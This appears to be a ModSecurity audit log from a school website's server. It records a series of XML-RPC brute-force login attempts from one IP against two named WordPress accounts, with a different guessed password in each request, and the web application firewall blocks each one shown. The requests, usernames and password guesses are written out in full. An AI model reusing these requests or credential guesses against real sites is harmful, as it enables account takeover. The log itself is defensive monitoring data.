[14/Jun/2025:08:55:01 +0700] aEzWdWIDXuKmWNi2UBS1WwAAAFQ 103.236.140.4 35050 103.236.140.4 8181 --8bbc102e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8bbc102e-C-- wp.getUsersBlogs wakasarpras asdsa --8bbc102e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8bbc102e-E-- --8bbc102e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866101953878 6112 (- - -) Stopwatch2: 1749866101953878 6112; combined=4239, p1=546, p2=3523, p3=0, p4=0, p5=101, sr=113, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8bbc102e-Z-- --388a8216-A-- [14/Jun/2025:08:55:30 +0700] aEzWkmIDXuKmWNi2UBS1gAAAAEo 103.236.140.4 35132 103.236.140.4 8181 --388a8216-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --388a8216-C-- wp.getUsersBlogs wakasarpras 1234%^&* --388a8216-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --388a8216-E-- --388a8216-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866130665651 4317 (- - -) Stopwatch2: 1749866130665651 4317; combined=3315, p1=355, p2=2760, p3=0, p4=0, p5=115, sr=80, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --388a8216-Z-- --045fa617-A-- [14/Jun/2025:08:56:01 +0700] aEzWsWIDXuKmWNi2UBS1wAAAAEI 103.236.140.4 35266 103.236.140.4 8181 --045fa617-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --045fa617-C-- wp.getUsersBlogs wakasarpras g_czechout --045fa617-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --045fa617-E-- --045fa617-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (100+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866161255568 4500 (- - -) Stopwatch2: 1749866161255568 4500; combined=3350, p1=340, p2=2821, p3=0, p4=0, p5=111, sr=79, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --045fa617-Z-- --17a7f215-A-- [14/Jun/2025:08:57:08 +0700] aEzW9GmwZ6YUkjOdtI7EGAAAAAE 103.236.140.4 35364 103.236.140.4 8181 --17a7f215-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --17a7f215-C-- wp.getUsersBlogs wakasarpras chicken --17a7f215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17a7f215-E-- --17a7f215-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866228572535 6048 (- - -) Stopwatch2: 1749866228572535 6048; combined=4156, p1=524, p2=3430, p3=0, p4=0, p5=117, sr=93, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17a7f215-Z-- --255d0e06-A-- [14/Jun/2025:08:58:08 +0700] aEzXMGmwZ6YUkjOdtI7EZgAAAAk 103.236.140.4 35540 103.236.140.4 8181 --255d0e06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --255d0e06-C-- wp.getUsersBlogs wakasarpras picture1 --255d0e06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --255d0e06-E-- --255d0e06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (85+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866288303749 4274 (- - -) Stopwatch2: 1749866288303749 4274; combined=3281, p1=360, p2=2752, p3=0, p4=0, p5=99, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --255d0e06-Z-- --5b78a645-A-- [14/Jun/2025:08:59:16 +0700] aEzXdF3g_boun6Rx5jLRPwAAAM4 103.236.140.4 35642 103.236.140.4 8181 --5b78a645-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5b78a645-C-- wp.getUsersBlogs wakasarpras 99999999 --5b78a645-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b78a645-E-- --5b78a645-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (47+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866356243897 5473 (- - -) Stopwatch2: 1749866356243897 5473; combined=3879, p1=506, p2=3171, p3=0, p4=0, p5=116, sr=126, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b78a645-Z-- --d27aea71-A-- [14/Jun/2025:09:00:24 +0700] aEzXuEMWfhkd5Y0sFtrrDQAAAIU 103.236.140.4 35752 103.236.140.4 8181 --d27aea71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d27aea71-C-- wp.getUsersBlogs wakasarpras arsenal --d27aea71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d27aea71-E-- --d27aea71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866424324133 5114 (- - -) Stopwatch2: 1749866424324133 5114; combined=3574, p1=455, p2=2929, p3=0, p4=0, p5=111, sr=86, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d27aea71-Z-- --2a3ccd7b-A-- [14/Jun/2025:09:01:24 +0700] aEzX9GIDXuKmWNi2UBS18wAAAEw 103.236.140.4 35898 103.236.140.4 8181 --2a3ccd7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2a3ccd7b-C-- wp.getUsersBlogs wakasarpras lollypop --2a3ccd7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a3ccd7b-E-- --2a3ccd7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866484632987 5630 (- - -) Stopwatch2: 1749866484632987 5630; combined=3957, p1=492, p2=3227, p3=0, p4=0, p5=134, sr=110, sw=104, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a3ccd7b-Z-- --9bb8ac0d-A-- [14/Jun/2025:09:02:24 +0700] aEzYMGIDXuKmWNi2UBS2EgAAAFI 103.236.140.4 36036 103.236.140.4 8181 --9bb8ac0d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9bb8ac0d-C-- wp.getUsersBlogs kasubagtu Admin@123 --9bb8ac0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bb8ac0d-E-- --9bb8ac0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (59+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866544167975 4254 (- - -) Stopwatch2: 1749866544167975 4254; combined=3295, p1=380, p2=2748, p3=0, p4=0, p5=97, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bb8ac0d-Z-- --4fcebd32-A-- [14/Jun/2025:09:03:27 +0700] aEzYb13g_boun6Rx5jLRZAAAAME 103.236.140.4 36134 103.236.140.4 8181 --4fcebd32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4fcebd32-C-- wp.getUsersBlogs kasubagtu kasubagtu1991 --4fcebd32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4fcebd32-E-- --4fcebd32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866607250324 5546 (- - -) Stopwatch2: 1749866607250324 5546; combined=3946, p1=478, p2=3206, p3=0, p4=0, p5=150, sr=100, sw=112, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fcebd32-Z-- --77e31d53-A-- [14/Jun/2025:09:04:37 +0700] aEzYtV3g_boun6Rx5jLRhAAAAM8 103.236.140.4 36210 103.236.140.4 8181 --77e31d53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --77e31d53-C-- wp.getUsersBlogs kasubagtu kasubagtu@2000 --77e31d53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77e31d53-E-- --77e31d53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866677254802 5506 (- - -) Stopwatch2: 1749866677254802 5506; combined=3728, p1=505, p2=3070, p3=0, p4=0, p5=91, sr=85, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77e31d53-Z-- --0b114501-A-- [14/Jun/2025:09:05:37 +0700] aEzY8WmwZ6YUkjOdtI7E_wAAAAw 103.236.140.4 36322 103.236.140.4 8181 --0b114501-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0b114501-C-- wp.getUsersBlogs kasubagtu kasubagtu@1988 --0b114501-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b114501-E-- --0b114501-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866737334369 4325 (- - -) Stopwatch2: 1749866737334369 4325; combined=3328, p1=338, p2=2732, p3=0, p4=0, p5=188, sr=78, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b114501-Z-- --40636510-A-- [14/Jun/2025:09:06:37 +0700] aEzZLUMWfhkd5Y0sFtrrOQAAAII 103.236.140.4 36440 103.236.140.4 8181 --40636510-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --40636510-C-- wp.getUsersBlogs kasubagtu Password --40636510-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40636510-E-- --40636510-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866797874575 4220 (- - -) Stopwatch2: 1749866797874575 4220; combined=3204, p1=359, p2=2681, p3=0, p4=0, p5=96, sr=84, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40636510-Z-- --7a370e7b-A-- [14/Jun/2025:09:07:45 +0700] aEzZcWIDXuKmWNi2UBS2PAAAAE8 103.236.140.4 36630 103.236.140.4 8181 --7a370e7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7a370e7b-C-- wp.getUsersBlogs kasubagtu 2222 --7a370e7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a370e7b-E-- --7a370e7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (93+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866865650252 4824 (- - -) Stopwatch2: 1749866865650252 4824; combined=3522, p1=417, p2=2923, p3=0, p4=0, p5=105, sr=87, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a370e7b-Z-- --0d16fd15-A-- [14/Jun/2025:09:08:45 +0700] aEzZrWIDXuKmWNi2UBS2YgAAAEk 103.236.140.4 36732 103.236.140.4 8181 --0d16fd15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0d16fd15-C-- wp.getUsersBlogs kasubagtu admin@888 --0d16fd15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d16fd15-E-- --0d16fd15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866925659957 4281 (- - -) Stopwatch2: 1749866925659957 4281; combined=3321, p1=367, p2=2783, p3=0, p4=0, p5=99, sr=82, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d16fd15-Z-- --b1208334-A-- [14/Jun/2025:09:09:48 +0700] aEzZ7GmwZ6YUkjOdtI7FggAAAAc 103.236.140.4 36890 103.236.140.4 8181 --b1208334-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b1208334-C-- wp.getUsersBlogs kasubagtu work --b1208334-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1208334-E-- --b1208334-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (73+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] 